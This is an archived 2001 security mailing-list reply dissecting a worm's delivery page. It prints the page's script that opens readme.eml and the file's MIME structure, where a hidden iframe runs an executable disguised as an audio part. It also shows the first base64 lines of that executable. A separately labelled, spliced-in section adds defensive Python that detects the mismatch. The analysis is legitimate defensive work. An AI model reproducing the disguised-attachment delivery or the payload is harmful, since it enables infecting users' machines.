Re: New Worm

From: Ray Simard (ray.simard@sylvan-glade.com)
Date: Tue Sep 18 2001 - 15:12:57 PDT

    On Tue, 18 Sep 2001 11:17:23 -0500, "Enrique A. Compań Gzz."
    <enriqueat_private> wrote:
    
    >...
    >Don't go there if you aren't protected. It downloads readme.eml
    >automatically and executes.
    >
    >It seg faults on my machine... fortunately
    
    This is what's on the page in raw form (some line breaks added):
    
    >telnet 64.218.116.235 80
    >Trying 64.218.116.235...
    >Connected to 64.218.116.235.
    >Escape character is '^]'.
    >GET /
    ><html><body bgcolor=black><br><br><br><br><br><br><table width=100%><td>
    ><p align="center"><font size=7 color=red>fuck USA Government</font><tr><td>
    ><p align="center"><font size=7 color=red>fuck PoizonBOx<tr><td>
    ><p align="center"><font size=4 color=red>contact:sysadmcnat_private</html>
    >
    ><html><script language="JavaScript">window.open("readme.eml", null,
    >"resizable=no,top=6000,left=6000")</script></html>Connection closed by foreign host.
    
    
    These are the headers and a few lines of the code from the readme.eml:
    
    telnet 64.218.116.235 80
    Trying 64.218.116.235...
    Connected to 64.218.116.235.
    Escape character is '^]'.
    GET /readme.eml
    
    MIME-Version: 1.0
    Content-Type: multipart/related;
    	type="multipart/alternative";
    	boundary="====_ABC1234567890DEF_===="
    X-Priority: 3
    X-MSMail-Priority: Normal
    X-Unsent: 1
    
    --====_ABC1234567890DEF_====
    Content-Type: multipart/alternative;
    	boundary="====_ABC0987654321DEF_===="
    
    --====_ABC0987654321DEF_====
    Content-Type: text/html;
    	charset="iso-8859-1"
    Content-Transfer-Encoding: quoted-printable
    
    
    <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
    <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
    </iframe></BODY></HTML>
    --====_ABC0987654321DEF_====--
    
    --====_ABC1234567890DEF_====
    Content-Type: audio/x-wav;
    	name="readme.exe"
    Content-Transfer-Encoding: base64
    Content-ID: <EA4DMGBP9p>
    
    TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
    ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO
    
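The delivery trick visible in the readme.eml capture above is a MIME header mismatch: an HTML part whose zero-size iframe loads a cid: part that is declared audio/x-wav but carries a file named readme.exe whose base64 body begins with the MZ header of a Windows executable. Mail clients of the period chose a handler from the declared type rather than the file name or the bytes, so such a part was opened without a prompt. The following Python is an added example, not code from the original post: it parses a constructed message that mirrors the structure captured above (the base64 body is a 64-byte stub starting with "MZ", not the worm binary) and flags any leaf part whose declared type disagrees with its name or its content, or that is pulled in by a hidden iframe. The list of executable extensions and the set of "inline" media types are assumed gateway policy, not anything the original post states.

```python
"""Added example: triage a MIME message for the delivery pattern in readme.eml.

Flags a part whose declared Content-Type disagrees with its file name or its
bytes, and any part loaded through a hidden <iframe src="cid:...">.
"""
import base64
import email
import re

# Assumed policy: names with these extensions never belong under a media type.
EXECUTABLE_EXTENSIONS = (".exe", ".com", ".scr", ".pif", ".bat", ".vbs", ".dll")
# Assumed: declared types that clients rendered inline rather than offering to save.
INLINE_MEDIA_TYPES = ("audio/", "image/", "video/")
IFRAME_CID_RE = re.compile(r'<iframe[^>]*\bsrc\s*=\s*"?cid:([^"\s>]+)', re.IGNORECASE)

# Constructed sample that mirrors the structure captured above.  The base64 body
# is a 64-byte stub beginning with the "MZ" DOS header, not the worm's readme.exe.
PE_STUB = base64.b64encode(b"MZ\x90\x00" + bytes(60)).decode()
SAMPLE_EML = "\r\n".join([
    "MIME-Version: 1.0",
    'Content-Type: multipart/related; type="multipart/alternative"; '
    'boundary="====_ABC1234567890DEF_===="',
    "X-Unsent: 1",
    "",
    "--====_ABC1234567890DEF_====",
    'Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_===="',
    "",
    "--====_ABC0987654321DEF_====",
    'Content-Type: text/html; charset="iso-8859-1"',
    "Content-Transfer-Encoding: quoted-printable",
    "",
    "<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>",
    "<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>",
    "</iframe></BODY></HTML>",
    "--====_ABC0987654321DEF_====--",
    "",
    "--====_ABC1234567890DEF_====",
    'Content-Type: audio/x-wav; name="readme.exe"',
    "Content-Transfer-Encoding: base64",
    "Content-ID: <EA4DMGBP9p>",
    "",
    PE_STUB,
    "--====_ABC1234567890DEF_====--",
    "",
])


def iframe_cids(msg):
    """Content-IDs that any HTML part pulls in through an <iframe src="cid:...">."""
    cids = set()
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        raw = part.get_payload(decode=True) or b""  # undoes quoted-printable here
        html = raw.decode(part.get_content_charset() or "latin-1", errors="replace")
        cids.update(IFRAME_CID_RE.findall(html))
    return cids


def analyse(raw_message):
    """Return one finding per leaf part whose declared type, name or bytes disagree."""
    msg = email.message_from_string(raw_message)
    referenced = iframe_cids(msg)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        name = (part.get_filename() or "").lower()      # from the name= parameter
        cid = (part.get("Content-ID") or "").strip("<>")
        body = part.get_payload(decode=True) or b""     # base64 decoded here
        reasons = []
        if name.endswith(EXECUTABLE_EXTENSIONS) and ctype.startswith(INLINE_MEDIA_TYPES):
            reasons.append("executable name %r declared as %s" % (name, ctype))
        if body[:2] == b"MZ" and not ctype.startswith("application/"):
            reasons.append("PE (MZ) header inside a %s body" % ctype)
        if cid and cid in referenced:
            reasons.append("loaded by <iframe src=cid:%s>" % cid)
        if reasons:
            findings.append({"content_id": cid, "filename": name,
                             "content_type": ctype, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_EML):
        print(f["content_type"], f["filename"], "->", "; ".join(f["reasons"]))
```

Run against the sample, the audio/x-wav part is reported for all three reasons; a plain text/plain message yields no findings. The MZ check is the one worth keeping even after the name and type checks, since an attacker controls both the file name and the declared type but not the first two bytes of a PE file.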

    This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 16:13:11 PDT